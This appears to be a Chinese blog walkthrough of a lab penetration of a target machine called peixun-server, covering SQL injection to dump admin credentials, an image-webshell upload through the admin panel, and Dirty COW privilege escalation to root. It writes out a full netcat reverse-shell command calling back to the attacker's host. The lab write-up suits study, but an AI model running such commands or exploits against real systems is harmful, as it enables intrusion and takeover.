靶机渗透之peixun-server提权

攻击机:

主机发现:

信息收集:

端口详细信息:

尝试访问80端口,发现其有一web站点可以访问:

对url:http://192.168.11.128/storypage_04.php?id=115进行测试,检查是否有SQL注入漏洞:

报错,此处应该有注入点。

爆破数据库名:

得到该数据库的所有数据库名:information_schema,mysql,performance_schema,tcic,test

爆当前使用的数据库为tcic:

爆表名:

tcic_account的字段:

爆account和password的数据:

拿到管理员的账号密码。

然后扫描后台网址:

发现后台为http://192.168.11.128/back,尝试访问:

用之前获取到的管理员账号密码登录:

对后台各个功能进行使用,发现“首页管理系统”中的“新增大图”能上传图片,制作图片马上传,看看能不能用,成功:

用菜刀连接试试:

http://192.168.11.133/back/upload/banner_66.php

连接成功,拿到webshell(注:中途重装过peixun-server,故IP变为192.168.11.133)。

下面尝试提权。

蚁剑输入命令:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.11.130 6666 >/tmp/f

然后在kali开启监听6666端口,反弹shell成功:

然后提权:

蚁剑上传dirty.c到服务器:

编译:

脏牛执行成功:

提权成功:

 

得到了root:

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值